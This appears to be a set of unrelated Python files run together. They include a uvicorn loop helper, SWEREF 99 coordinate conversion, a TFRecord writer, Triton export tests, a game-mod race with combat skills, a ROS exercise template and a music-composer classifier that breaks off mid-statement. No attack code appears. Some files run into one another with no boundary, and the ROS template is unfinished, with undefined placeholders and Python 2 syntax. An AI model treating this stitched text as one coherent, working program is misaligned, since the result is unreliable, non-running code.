        <style>
        div {
          overflow: hidden;
          height: 50px;
          background: green;
        }

        input {
          margin-top: 100px;
          background: red;
        }
        </style>

        <div><input></div>
        """)
    target = session.find.css("input", all=False)
    assert_error(element_click(session, target), "element not interactable")
|
def auto_loop_setup():
    """Install uvloop's event-loop policy when available, else fall back to asyncio."""
    try:
        import uvloop  # noqa
    except ImportError:  # pragma: no cover
        from uvicorn.loops.asyncio import asyncio_setup
        asyncio_setup()
    else:
        from uvicorn.loops.uvloop import uvloop_setup
        uvloop_setup()
|
import numpy as np
from sweref99 import projections
from kmm.positions.positions import Positions
# Shared SWEREF 99 TM projection used for grid <-> geodetic conversions below.
tm = projections.make_transverse_mercator("SWEREF_99_TM")
def geodetic(positions: Positions):
    """Return a copy of *positions* with WGS84 longitude/latitude columns
    derived from the SWEREF 99 TM grid coordinates."""
    df = positions.dataframe
    if len(df) == 0:
        return positions.replace(dataframe=df.assign(longitude=[], latitude=[]))
    coords = [
        tm.grid_to_geodetic(row.sweref99_tm_x, row.sweref99_tm_y)
        for row in df[["sweref99_tm_x", "sweref99_tm_y"]].itertuples()
    ]
    latitude = [c[0] for c in coords]
    longitude = [c[1] for c in coords]
    return positions.replace(dataframe=df.assign(longitude=longitude, latitude=latitude))
def test_geodetic():
    """Converted coordinates for the sample recording should fall inside Sweden."""
    frame = geodetic(Positions.from_path("tests/ascending_B.kmm2")).dataframe
    lat, lon = frame["latitude"], frame["longitude"]
    assert ((lat > 55) & (lat < 68)).all()
    assert ((lon > 7) & (lon < 25)).all()
def test_sweref_library():
    """A geodetic -> grid -> geodetic round trip must be lossless."""
    original = (57.705918, 11.987286)
    grid = tm.geodetic_to_grid(*original)
    roundtrip = tm.grid_to_geodetic(*grid)
    assert np.allclose(original, roundtrip)
|
# Copyright 2020 The OpenAGI Datum Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from itertools import islice
from typing import Any, Callable, Dict, List, Optional, Tuple
import numpy as np
import tensorflow as tf
from absl import logging
from datum.cache.bucket import DuplicatedKeysError, Shuffler
from datum.utils import shard_utils
from datum.utils.common_utils import datum_to_type_and_shape
from datum.utils.tqdm_utils import tqdm
from datum.utils.types_utils import DatumType
class TFRecordWriter():
  """TFRecord writer interface.

  This module is used to convert data into serialized binary string and to write data
  as tfrecords to disk. It uses a cache to shuffle and store intermediate serialized binary
  string tensors.

  Args:
    generator: an instance of a datum generator.
    serializer: an instance of datum serializer.
    path: absolute path to store the tfrecords data and metadata.
    split: name of the split.
    total_examples: number of examples to write.
    sparse_features: optional list of feature names holding sparse tensors; their
      original shapes are recorded so they can be restored at read time.
    gen_kwargs: optional keyword arguments to use when calling the generator.
  """

  def __init__(self,
               generator: Callable,
               serializer: Callable,
               path: str,
               split: str,
               total_examples: int,
               sparse_features: Optional[List[str]] = None,
               **gen_kwargs: Any):
    """ path = /tmp/test/
        split = train/val/test
    """
    self.generator = generator
    self.serializer = serializer
    # The shuffle cache lives next to (not inside) the output directory.
    self.shuffler = Shuffler(os.path.dirname(path), split)
    self._base_path = path
    self.path = os.path.join(path, split)
    self.current_examples = 0
    self.total_examples = total_examples
    self.split = split
    self.sparse_features = sparse_features or []
    self.gen_kwargs = gen_kwargs or {}
    # The generator is always told which split it is producing.
    self.gen_kwargs.update({'split': self.split})

  def cache_records(self) -> None:
    """Write data to cache."""
    for key, datum in tqdm(self.generator(**self.gen_kwargs),
                           unit=" examples",
                           total=self.total_examples,
                           leave=False):
      if self.sparse_features:
        logging.debug(f'Adding shapes info to datum for sparse features: {self.sparse_features}.')
        datum = self.add_shape_fields(datum)
      serialized_record = self.serializer(datum)
      self.shuffler.add(key, serialized_record)
      self.current_examples += 1
    # NOTE(review): `datum` below is the last loop value — this raises NameError
    # for an empty generator and records only the final example's types/shapes.
    # Confirm every example shares the same schema.
    with tf.io.gfile.GFile(os.path.join(self._base_path, 'datum_to_type_and_shape_mapping.json'),
                           'w') as js_f:
      logging.info(f'Saving datum type and shape metadata to {self._base_path}.')
      types_shapes = datum_to_type_and_shape(datum, self.sparse_features)
      json.dump(types_shapes, js_f)

  def create_records(self) -> None:
    """Create tfrecords from given generator."""
    logging.info('Caching serialized binary example to cache.')
    self.cache_records()
    logging.info('Writing data from cache to disk in `.tfrecord` format.')
    self.flush()

  def add_shape_fields(self, datum: DatumType) -> DatumType:
    """Add tensor shape information to dataset metadata json file and tfrecords. This is required
    when dealing with sparse tensors. As we need to revert back the original shape of tensor,
    when tensor dimension >= 2.

    Args:
      datum: a dict, input datum.

    Returns:
      input dict updated with sparse tensors shape information.
    """
    new_fields = {}
    for sparse_key in self.sparse_features:
      if sparse_key in datum:
        value = np.asarray(datum[sparse_key])
        # Only rank >= 2 tensors need an explicit `<name>_shape` companion field.
        if len(value.shape) >= 2:
          new_fields[sparse_key + '_shape'] = list(value.shape)
    datum.update(new_fields)
    return datum

  def flush(self) -> None:
    """Write tfrecord files to disk."""
    self.flush_records()

  def flush_records(self) -> Tuple[Dict[str, Dict[str, int]], int]:
    """Write tfrecord files to disk.

    Returns:
      a tuple containing a dict with shard info and the size of shuffler.
    """
    logging.info(f"Shuffling and writing examples to {self.path}")
    shard_specs = shard_utils.get_shard_specs(self.current_examples, self.shuffler.size,
                                              self.shuffler.bucket_lengths, self.path)
    examples_generator = iter(
        tqdm(self.shuffler, total=self.current_examples, unit=" examples", leave=False))
    try:
      for shard_spec in shard_specs:
        # Take exactly `examples_number` items from the shuffled stream per shard.
        iterator = islice(examples_generator, 0, shard_spec.examples_number)
        shard_utils.write_tfrecord(shard_spec.path, iterator)
    except DuplicatedKeysError as err:
      shard_utils.raise_error_for_duplicated_keys(err)
    shard_info = {
        self.split: {spec.path.split('/')[-1]: int(spec.examples_number)
                     for spec in shard_specs}
    }
    self.save_shard_info(shard_info)
    logging.info(f"Done writing {self.path}. Shard lengths: {list(shard_info[self.split].values())}")
    return shard_info, self.shuffler.size

  def save_shard_info(self, shard_info: Dict[str, Dict[str, int]]) -> None:
    """Save shard info to disk.

    Args:
      shard_info: input shard info dict.
    """
    if os.path.isfile(os.path.join(self._base_path, 'shard_info.json')):
      with tf.io.gfile.GFile(os.path.join(self._base_path, 'shard_info.json'), 'r') as si_f:
        prev_shard_info = json.load(si_f)
      # NOTE(review): update() gives precedence to the previously saved entries,
      # so an existing entry for this split overwrites the fresh one — confirm
      # this merge order is intended.
      shard_info.update(prev_shard_info)
    with tf.io.gfile.GFile(os.path.join(self._base_path, 'shard_info.json'), 'w') as si_f:
      json.dump(shard_info, si_f)
|
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from tempfile import TemporaryDirectory
from pathlib import Path
import filecmp
from towhee import ops
from serve.triton.to_triton_models import PyOpToTriton, PreprocessToTriton, PostprocessToTriton,ModelToTriton
from . import EXPECTED_FILE_PATH
class TestPyOpToTriton(unittest.TestCase):
    """Export of a pure-Python operator into a Triton model repository."""

    def test_py_to_triton(self):
        with TemporaryDirectory(dir='./') as root:
            op = ops.local.triton_py().get_op()
            PyOpToTriton(op, root, 'py_to_triton_test', 'local', 'triton_py', {}).to_triton()
            expected = Path(EXPECTED_FILE_PATH) / 'py_to_triton_test'
            actual = Path(root) / 'py_to_triton_test'
            self.assertTrue(filecmp.cmp(expected / 'config.pbtxt', actual / 'config.pbtxt'))
            self.assertTrue(filecmp.cmp(expected / '1' / 'model.py', actual / '1' / 'model.py'))
class TestPreprocessor(unittest.TestCase):
    """Export of an nnop's preprocess stage into a Triton model repository."""

    def test_processor(self):
        with TemporaryDirectory(dir='./') as root:
            op = ops.local.triton_nnop(model_name='test').get_op()
            PreprocessToTriton(op, root, 'preprocess').to_triton()
            expected = Path(EXPECTED_FILE_PATH) / 'preprocess'
            actual = Path(root) / 'preprocess'
            self.assertTrue(filecmp.cmp(expected / 'config.pbtxt', actual / 'config.pbtxt'))
            # Both the pickled callable and the generated model stub must exist.
            self.assertTrue((actual / '1' / 'preprocess.pickle').is_file())
            self.assertTrue((actual / '1' / 'model.py').is_file())
class TestPostprocessor(unittest.TestCase):
    """Export of an nnop's postprocess stage into a Triton model repository."""

    def test_processor(self):
        with TemporaryDirectory(dir='./') as root:
            op = ops.local.triton_nnop(model_name='test').get_op()
            PostprocessToTriton(op, root, 'postprocess').to_triton()
            expected = Path(EXPECTED_FILE_PATH) / 'postprocess'
            actual = Path(root) / 'postprocess'
            self.assertTrue(filecmp.cmp(expected / 'config.pbtxt', actual / 'config.pbtxt'))
            # Both the pickled callable and the generated model stub must exist.
            self.assertTrue((actual / '1' / 'postprocess.pickle').is_file())
            self.assertTrue((actual / '1' / 'model.py').is_file())
class TestToModel(unittest.TestCase):
    '''
    Test nnop model to triton.
    '''
    def test_to_model(self):
        with TemporaryDirectory(dir='./') as root:
            op = ops.local.triton_nnop(model_name='test').get_op()
            to_triton = ModelToTriton(op.model, root, 'nnop')
            to_triton.to_triton()
            expect_root = Path(EXPECTED_FILE_PATH) / 'nnop'
            dst = Path(root) / 'nnop'
            # BUG FIX: the filecmp.cmp result was computed but never asserted,
            # so the test could not fail on a config mismatch.
            self.assertTrue(filecmp.cmp(expect_root / 'config.pbtxt', dst / 'config.pbtxt'))
|
"""
"""
## python imports
from random import randint
## source.python imports
from effects.base import TempEntity
from engines.sound import StreamSound
from engines.precache import Model
from entities.entity import Entity
from filters.players import PlayerIter
from listeners.tick import Repeat
from weapons.manager import weapon_manager
## warcraft.package imports
from warcraft.commands.messages import send_wcs_saytext_by_index
from warcraft.players import player_dict
from warcraft.race import Race
from warcraft.registration import events, clientcommands
from warcraft.skill import Skill
from warcraft.utility import classproperty, CooldownDict
## __all__ declaration
__all__ = ("OrcishHorde", )
## OrcishHorde declaration
# Sounds streamed to clients; download=True adds them to the server downloadables.
chain_sound = StreamSound('source-python/warcraft/chain_lightning.wav', download=True)
root_sound = StreamSound('source-python/warcraft/root.mp3', download=True)
class OrcishHorde(Race):
    """Orcish Horde race definition; skills are attached via @OrcishHorde.add_skill."""

    # Banner image shown in race menus.
    image = "https://liquipedia.net/commons/images/thumb/7/76/Orcrace.png/200px-Orcrace.png"

    @classproperty
    def description(cls):
        return 'Recoded Orcish Horde. (Kryptonite)'

    @classproperty
    def max_level(cls):
        return 99

    @classproperty
    def requirement_sort_key(cls):
        return 3
@OrcishHorde.add_skill
class BloodFury(Skill):
    """Periodically primes a critical strike that multiplies outgoing damage
    and draws a beam from the attacker's weapon to the aim point."""

    laser = Model('sprites/lgtning.vmt', True)

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.can_crit = False
        self.counter = 0
        self.repeater = None
        self.beam = TempEntity('BeamPoints', alpha=255, red=0, green=255, blue=0,
                               life_time=1.0, model_index=self.laser.index,
                               start_width=3, end_width=3, frame_rate=255,
                               halo_index=self.laser.index)

    @classproperty
    def description(cls):
        return 'You are able to hit vital points, causing major damage.'

    @classproperty
    def max_level(cls):
        return 8

    _msg_a = '{{GREEN}}Critical strike {{PALE_GREEN}}on {{RED}}{name} {{PALE_GREEN}}caused {{DULL_RED}}vital damage!'

    @events('player_spawn', 'skill_level_up')
    def _on_spawn_start_repeat(self, player, **kwargs):
        self.can_crit = True
        self.counter = 0
        # BUG FIX: this handler fires on both spawn and level-up; stop any
        # running repeater first so ticks do not stack and speed up the crit timer.
        if self.repeater:
            self.repeater.stop()
        self.repeater = Repeat(self._on_game_tick, kwargs={}, cancel_on_level_end=True)
        self.repeater.start(0.1)

    @events('player_death')
    def _on_death_stop_repeat(self, player, **kwargs):
        if self.repeater:
            self.repeater.stop()

    @events('player_pre_attack')
    def _on_player_pre_attack(self, attacker, victim, info, **kwargs):
        if self.level == 0:
            return

        if self.can_crit:
            # +20% damage per level while the crit is primed.
            info.damage *= 1 + 0.2 * self.level
            send_wcs_saytext_by_index(self._msg_a.format(name=victim.name), attacker.index)
            weapon = attacker.active_weapon
            if weapon and weapon.weapon_name.split("_")[-1] not in weapon_manager.projectiles:
                start_location = weapon.origin.copy()
                start_location.z += 40
                end_location = attacker.get_view_coordinates()
                self.beam.create(start_point=start_location, end_point=end_location)
            # Consume the crit; the repeater re-arms it after enough ticks.
            self.can_crit = False
            self.counter = 0

    def _on_game_tick(self):
        self.counter += 1
        # Higher level -> fewer ticks (0.1s each) until the next crit is primed.
        if self.counter == 256 - (self.level * 2):
            self.can_crit = True
@OrcishHorde.add_skill
class EarthgrabTotem(Skill):
    """Chance-on-hit root that pins the victim in place for 1.5 seconds."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.model = Model('sprites/blueflare1.vmt', True)
        self.model._precache()
        self.effect = TempEntity('BeamRingPoint', start_radius=120,
            end_radius=0, model_index=self.model.index, halo_index=self.model.index,
            life_time=1.5, amplitude=10, red=10, green=255, blue=10, alpha=245, flags=0,
            start_width=6, end_width=6)
        if not root_sound.is_precached:
            root_sound.precache()

    @classproperty
    def description(cls):
        return 'Root your enemies to the ground, 16-24% chance.'

    @classproperty
    def max_level(cls):
        return 8

    _msg_a = '{{GREEN}}Rooted {{RED}}{name} {{PALE_GREEN}}to the ground.'
    _msg_b = '{{PALE_GREEN}}You have been {{GREEN}}rooted {{PALE_GREEN}}to the ground by {{RED}}{name}.'

    @events('player_pre_attack')
    def _on_player_pre_attack(self, attacker, victim, **kwargs):
        if self.level == 0:
            return

        # NOTE(review): actual proc chance is (16 + level)% = 17-24% at levels
        # 1-8, while the description says 16-24% — confirm which is intended.
        if randint(1, 100) <= 16 + self.level and not victim.stuck:
            victim.stuck = True
            # Release the root after 1.5s (matches the ring effect life_time).
            victim.delay(1.5, victim.__setattr__, args=('stuck', False))
            send_wcs_saytext_by_index(self._msg_a.format(name=victim.name), attacker.index)
            send_wcs_saytext_by_index(self._msg_b.format(name=attacker.name), victim.index)
            root_sound.index = victim.index
            root_sound.origin = victim.origin
            root_sound.play()
            self.effect.create(center=victim.origin)
            self.effect.create(center=victim.origin, start_radius=80)
@OrcishHorde.add_skill
class Reincarnation(Skill):
    """Chance on death to respawn at the old location with the old weapons."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.weapons = []
        self.location = None

    @classproperty
    def description(cls):
        return 'Upon death, the shamans will ressurect you in your old location, 25-33% chance.'

    @classproperty
    def max_level(cls):
        return 8

    _msg_a = '{ORANGE}Respawning {PALE_GREEN}in {GREEN}1 {PALE_GREEN}second.'

    def _force_drop_weapons(self, player):
        # Drop everything but the knife so give_named_item does not duplicate.
        for index in player.weapon_indexes(not_filters='knife'):
            entity = Entity(index)
            player.drop_weapon(entity.pointer, None, None)

    @events('player_pre_victim')
    def _on_pre_death_obtain_weapons(self, victim, **kwargs):
        # Snapshot loadout and position just before the kill is applied.
        self.weapons = [Entity(index).class_name for index in victim.weapon_indexes(
            not_filters='knife')
        ]
        self.location = victim.origin.copy()
        self.location.z += 1

    @events('player_death')
    def _on_death_respawn(self, player, **kwargs):
        if self.level == 0:
            return

        # BUG FIX: randint(1, 101) sampled 101 outcomes, so the real chance was
        # (25 + level)/101 instead of the advertised (25 + level)%.
        if randint(1, 100) <= 25 + self.level:
            player.delay(1.5, player.spawn)
            player.delay(2, self._force_drop_weapons, args=(player, ))
            for weapon in self.weapons:
                player.delay(3, player.give_named_item, args=(weapon, ))
            if self.location:
                player.delay(2.2, player.teleport, args=(self.location, ))
            send_wcs_saytext_by_index(self._msg_a, player.index)
@OrcishHorde.add_skill
class ChainLightning(Skill):
    """Ultimate: a lightning bolt that ricochets between up to 3 nearby enemies."""

    laser = Model('sprites/lgtning.vmt', True)

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.cooldowns = CooldownDict()
        self.beam = TempEntity('BeamPoints', alpha=255, red=255, green=200, blue=200,
                               life_time=1.0, start_width=15, end_width=15, frame_rate=255)
        self.laser = Model('sprites/lgtning.vmt')
        self.laser._precache()

    @classproperty
    def description(cls):
        return 'You channel a lightning rod which ricochets from player to player.'

    @classproperty
    def max_level(cls):
        return 8

    @classmethod
    def is_available(cls, player):
        return player.race.level > 8

    _msg_a = '{GREEN}Chain Lightning {RED}hit enemies{PALE_GREEN}!'
    _msg_c = '{{GREEN}}Chain Lightning {{PALE_GREEN}}is on cooldown for {{DULL_RED}}{time:0.1f} {{PALE_GREEN}}seconds.'
    _msg_f = '{GREEN}Chain Lightning {PALE_GREEN}found {DULL_RED}no enemies{PALE_GREEN}!'

    def _find_closest_player(self, player, team_index, length=99999, exclusions=None):
        """Return the nearest living enemy within *length*, skipping *exclusions*."""
        # BUG FIX: the original used a mutable default (exclusions=[]), which is
        # shared across all calls that omit the argument.
        if exclusions is None:
            exclusions = []
        _target = None
        for target in player_dict.values():
            if target.dead or target.team_index == team_index or target in exclusions or target.ultimate_immune:
                continue
            _distance = player.origin.get_distance(target.origin)
            if _distance < length:
                _target = target
                length = _distance
        return _target

    def _find_chain_players(self, player, length, count):
        """Greedily chain up to *count* targets, each nearest to the previous one."""
        _last_target = player
        team_index = player.team_index
        _targets = []
        while count > 0:
            if not _last_target:
                break
            _target = self._find_closest_player(_last_target, team_index, length, _targets)
            _targets.append(_target)
            _last_target = _target
            count -= 1
        return _targets

    @events('player_spawn')
    def _on_player_spawn_reset(self, player, **kwargs):
        # Short grace period after spawning before the ultimate is usable.
        self.cooldowns['ultimate'] = 4

    @clientcommands('ultimate')
    def _on_player_ultimate(self, player, **kwargs):
        if self.level == 0:
            return

        _cooldown = self.cooldowns['ultimate']
        if _cooldown <= 0:
            last_target = player
            targets = self._find_chain_players(player, 500, 3)
            # BUG FIX: identity check (is None) instead of == None.
            if targets[0] is None:
                send_wcs_saytext_by_index(self._msg_f, player.index)
                return
            for target in targets:
                if not target:
                    continue
                target.take_damage(20+5*self.level, attacker_index=player.index, skip_hooks=True)
                location1 = last_target.origin.copy()
                location2 = target.origin.copy()
                location1.z += 40
                location2.z += 40
                self.beam.create(start_point=location1, end_point=location2, halo=self.laser, model=self.laser)
                last_target = target
            chain_sound.index = player.index
            chain_sound.origin = player.origin
            chain_sound.play()
            send_wcs_saytext_by_index(self._msg_a, player.index)
            self.cooldowns['ultimate'] = 20
        else:
            send_wcs_saytext_by_index(self._msg_c.format(time=_cooldown), player.index)
from .text_classifier import TextClassifier # noqa
|
#!/usr/bin/env python
# Import modules
import numpy as np
from visualization_msgs.msg import Marker
import rospy
import tf
from geometry_msgs.msg import Pose
from std_msgs.msg import String
from franka_description.srv import *
# function to load parameters and request PickPlace service
def franka_mover():
    # NOTE(review): this is a course exercise template (Python 2); `grasp_list`,
    # `OBJECT_NAME` and `PICK_POSE` are placeholders that remain undefined until
    # the TODOs below are completed.
    # TODO: Get parameter "/grasp_list" from ros param server and save it to variable grasp_list, grasp_list is a python dictionary data type

    # Loop through each picking item, the name and pose of the picking items is stored in ros parameter "/grasp_list"
    for obj in grasp_list:

        # TODO: get the name of picking item and store it in ROS message type String
        object_name = String()

        # TODO: get the pose of picking item and store it in ROS message type Pose. Please add an offset of 0.13 meter above the items's z value (grasp_list[object_name]['position']['z'] + 0.13).
        pick_pose = Pose()

        # Wait for 'pick_place_routine' service to come up
        rospy.wait_for_service('pick_place_routine')

        try:
            pick_place_routine = rospy.ServiceProxy('pick_place_routine', PickPlace)

            # TODO: Insert your message variables to be sent as a service request
            resp = pick_place_routine(OBJECT_NAME, PICK_POSE)

            print ("Response: ",resp.success)

        except rospy.ServiceException, e:
            print "Service call failed: %s"%e
if __name__ == '__main__':
    # TODO: ROS node initialization
    # TODO: call the robot mover function defined above
    # TODO: Spin while node is not shutdown
    # BUG FIX: a suite containing only comments is a SyntaxError in Python;
    # `pass` keeps this template importable until the TODOs are filled in.
    pass
|
import pygame

pygame.init()
pygame.mixer.music.load('Desafio21.mp3')
pygame.mixer.music.play()
# BUG FIX: `while get_busy(): pass` busy-waits and pins a CPU core; sleep in
# short increments instead while blocking until playback finishes.
while pygame.mixer.music.get_busy():
    pygame.time.wait(100)
#!/usr/bin/env python
#________INDEX____________.
#                         |
#  6 functions            |
#    (6 = 3 + 2 + 1)      |
#                         |
#  - 3 auxiliary          |
#  - 2 plotting           |
#  - 1 main               |
#                         |
#  (if __name__==__main__)|
#_________________________|
import os
import sys
import pickle
import re
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from joblib import dump,load
from keras.initializers import LecunNormal
from keras import Sequential, backend
from keras.losses import categorical_crossentropy
from keras.layers import Dense
from keras.optimizers import SGD
from keras.models import load_model
from keras.metrics import AUC
from math import ceil
from random import randrange, sample, choice
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import roc_curve, auc
from sklearn.preprocessing import OneHotEncoder
from sympy.solvers import solve
from sympy import Symbol
from time import sleep
#----------------------------------------------------
# Three auxiliary generic function
#
# (1) "tags_dict" : mapping from numbers
# to composers names
#
# (2) "pickle_bridge" : recieves and returns
# the same data. Optionally
# it saves it before return
#
# (3) "backend_wrapper" : executes functions and
# before returning it
# manually asks for memory
# release; in case this
# script is iterated
#---------------------------------------------------
# (1)
def tags_dict():
    """
    ENCODER
    names (e.g. Bach) <--> numbers (0-7)

    Parses datasets/tags.dat and returns (name -> number, number -> name).
    """
    name_pattern = re.compile('item:[ ]+([a-z]+)', re.I)
    number_pattern = re.compile('key:[ ]+([0-9]+)', re.I)
    with open('datasets/tags.dat', 'r') as f:
        raw_lines = f.readlines()
    tags = {
        re.search(name_pattern, line).group(1): re.search(number_pattern, line).group(1)
        for line in raw_lines
    }
    inverted_tags = {number: name for name, number in tags.items()}
    return tags, inverted_tags
# (2)
def pickle_bridge(A, B, save=False):
    """Pass *A* and *B* through unchanged, optionally pickling *A* first.

    Args:
        A: payload dict; dumped to ``info.pickle`` when *save* is True.
        B: companion value, returned untouched.
        save: keyword flag replacing the original hard-coded ``if True``
            switch (which made the dump unreachable dead code). The default
            preserves the old behavior of never saving.

    Returns:
        The ``(A, B)`` pair, unchanged.
    """
    if save:
        with open("info.pickle", "wb") as f:
            pickle.dump(A, f)
    return A, B
# (3)
def backend_wrapper(process, debug=True):
    """
    Memory leak protection:
    backend_wrapper(main(foo))
    should help in the releasing
    of plots and tensorflow

    Args:
        process: zero-argument callable to execute.
        debug: when True (default, matching the original hard-coded flag) run
            *process* directly; when False, wrap it with Keras session
            clearing and catch-all error reporting.
    """
    # BUG FIX: `debug` was a hard-coded local, so the protective branch was
    # unreachable; it is now a backward-compatible keyword argument.
    if debug:
        process()
    else:
        backend.clear_session()
        try:
            process()
            print('SUCCESS!')
        except Exception as ins:
            print('ERROR: unexpected. \n', ins.args)
        backend.clear_session()
    return
#----------------------------------------------------
# Two plotting functions
#
# (4) "simple_plotter" : recieves predictions and,
# if it was a neural network,
# plots ROC curves, output
# weights, and training curves
#
# (5) "multi_rocker" : plots the one-vs-all ROC's
#
#---------------------------------------------------
# (4)
def simple_plotter(h: dict, case: str):
    """Plot training curves, ROC curves, and per-class output-weight histograms
    for a neural-network run; no-op for the random forest.

    Args:
        h: training history dict; must contain 'ytrue'/'ypred' (removed here)
           plus per-epoch series such as 'auc', 'val_auc', 'loss', 'val_loss'.
        case: 'network' or 'forest'.
    """
    # If 'forest': dont show info
    if case=='forest': return
    fs = 12
    # A plotting auxiliary function: histogram of predicted weights for one
    # class, split into true-positive and true-negative populations.
    def individual_weights(ytrue_, ypred_, axy, flag):
        # NOTE(review): `len_error` is not defined anywhere in this module —
        # confirm it exists elsewhere or this branch raises NameError.
        if len(ytrue_)==len(ypred_): L = len(ypred_)
        else: len_error(ytrue_,ypred_)
        temp = pd.concat(
            [
                pd.DataFrame(
                    {
                        f'prediction {flag}':
                        [ypred_[i] for i in range(L) if ytrue_[i]==1],
                        'type':
                        f'positive {flag}' ,
                    }
                ),
                pd.DataFrame(
                    {
                        f'prediction {flag}':
                        [ypred_[i] for i in range(L) if ytrue_[i]==0],
                        'type':
                        f'negative {flag}',
                    }
                ),
            ]
        )
        for x in [f'positive {flag}',f'negative {flag}']:
            sns.distplot(temp[temp['type']==x][f'prediction {flag}'],
                         bins=[y/10 for y in range(11)],
                         ax=axy, kde=False,
                         norm_hist=True,
                         label=x,)
        axy.set_xlim(0,1)
        axy.set_xlabel('Output Weights',fontsize=fs)
        axy.set_title('output weights por categoria',fontsize=fs)
        # Decision threshold marker.
        axy.axvline(x=0.5,c='r',lw=1,ls='-')
    # Create the Figure and preprocess data
    f,ax = plt.subplots(2,5,figsize=(21,12))
    L = h['ytrue'].shape[0]
    ytrue, ypred = h['ytrue'], h['ypred']
    # Remove array-valued entries so the remainder converts cleanly to a frame.
    del h['ytrue']
    del h['ypred']
    h = pd.DataFrame(h)
    h['ref 100%']=1
    h['ref null hypothesis']=0.5
    # Averages over the last 3 epochs (computed but not currently displayed).
    fit_data = {'train auc': np.mean(h['auc'][-3:]),
                'validation auc': np.mean(h['val_auc'][-3:]),
                'train loss': np.mean(h['loss'][-3:]),
                'validation loss':np.mean(h['val_loss'][-3:]),}
    # PLOT 0: Training & Validation Curves VS Epochs
    sns.lineplot(data=h, ax=ax[0,0])
    ax[0,0].set_title(f'Loss & Accuracy vs Epochs',fontsize=fs)
    ax[0,0].set_xlabel('epochs',fontsize=fs)
    ax[0,0].set_ylim(0,2.5)
    # PLOT 1: Validation set's ROC
    multi_rocker(ax[0,1],ytrue,ypred)
    ax[0,1].set_ylim(0,1.05)
    ax[0,1].set_xlim(0,1)
    ax[0,1].set_title(f'ROC curves',fontsize=fs)
    ax[0,1].legend()
    # PLOTS 2 TO 10: Output Weights "per Class" (i.e. per composer)
    axind = {0:(0,2), 1:(0,3), 2:(0,4),
             3:(1,0),4:(1,1),
             5:(1,2),6:(1,3),7:(1,4),}
    for J in range(len(ytrue[0])):
        a = [x[J] for x in ytrue]
        b = [x[J] for x in ypred]
        individual_weights(
            a,
            b,
            ax[axind[J] ],
            J,
        )
        ax[axind[J]].legend()
    # Tight Layout and save!
    plt.tight_layout()
    f.savefig('results/last-neural-network.png')
    return
# (5)
def multi_rocker(
        axy: plt.Axes,
        y_trues: np.ndarray,
        y_preds: np.ndarray,
        ):
    """
    One-Vs-All ROC-curve:

    Draw a per-class ROC curve (with AUC in the label) for every composer
    onto *axy*, plus a dotted diagonal for the null hypothesis.

    Args:
        axy: matplotlib Axes to draw on.
        y_trues: one-hot ground truth, shape (n_samples, n_classes) — assumed;
            TODO confirm with callers.
        y_preds: predicted scores, same shape as y_trues.
    """
    # BUG FIX: the annotation was `type(plt.subplots()[1])`, which called
    # plt.subplots() at definition time and silently created/leaked a figure
    # on every import of this module.
    fpr = dict()
    tags = tags_dict()[1]
    tpr = dict()
    roc_auc = dict()
    n_classes = len(y_trues[0])
    wanted = list(range(n_classes))
    for i in range(n_classes):
        fpr[i], tpr[i], _ = roc_curve(y_trues[:, i], y_preds[:, i])
        roc_auc[i] = round(auc(fpr[i], tpr[i]), 2)
    for i in range(n_classes):
        axy.plot(fpr[i], tpr[i], label=f'case {tags[str(wanted[i])]}'\
                 f' auc {roc_auc[i]}')
    # Axis setup hoisted out of the loop (it was repeated per class).
    axy.set_xlim([0.0, 1.0])
    axy.set_ylim([0.0, 1.1])
    axy.set_xlabel('False Positive Rate')
    axy.set_ylabel('True Positive Rate')
    # Null-hypothesis diagonal drawn on the last class's FPR grid.
    axy.plot(fpr[i], fpr[i], label='null hypothesis', lw=1.5, ls=':', c='r')
    axy.legend(loc="lower right")
    return
#--------------------------
# MAIN: builds, fit and
# evaluate AI-based models
#--------------------------
# (6)
def main(**kwargs):
    """
    1-Load the data
    2-Build the network OR forest
    3-Fit it
    4-Return evaluations

    KWARGS:
      for all:
        "case" = 'network' or 'forest'
      for network:
        "neurons"
        "epochs"
        "batch"
        "lr" (learning rate)
        "deep" (0-N hidden layers)
        "verbose" ()

    Returns:
        (history, case): history holds 'ytrue'/'ypred' for the validation set
        (plus Keras per-epoch metrics in the 'network' case); case echoes the
        model kind. Predictions are also appended to CSVs under results/.
    """
    #Step 0) KEYS retrieval
    #---------------------------------------------------
    batch = kwargs.get('batch',32)
    epochs = kwargs.get('epochs',100)
    neurons = kwargs.get('neurons',16)
    verbose = kwargs.get('verbose',1)
    LR = kwargs.get('lr',0.01)
    deep = kwargs.get('deep',0)
    case = kwargs.get('case','network')
    #Step 1) LOAD Data
    #---------------------------------------------------
    # NOTE(review): assumes database.pkl maps split names to (X, y) pairs with
    # keys 'total-train', 'val' and 'test' — confirm against the builder script.
    with open('datasets/database.pkl','rb') as f:
        data = pickle.load(f)
    # Fix keys! "total-train"-->"train"
    data['train'] = data['total-train']
    del(data['total-train'])
    #Step 2) BUILD the network OR forest
    #---------------------------------------------------
    if case=='network':
        # One Hot Encoding:
        # ytrue = [0,3,..]--> [[1,0,..], [0,0,0,1,..], ..]
        #
        if True:
            for x in data.keys():
                data[x] = (data[x][0],
                           OneHotEncoder().fit_transform(
                               data[x][1].reshape(-1,1)
                           ).toarray(),)
        # INFO: there are 8 composers
        last_neur_shape = 8
        # First layer!
        architecture = [Dense(neurons,activation='selu',
                              input_shape=(len(data['train'][0][0]),),
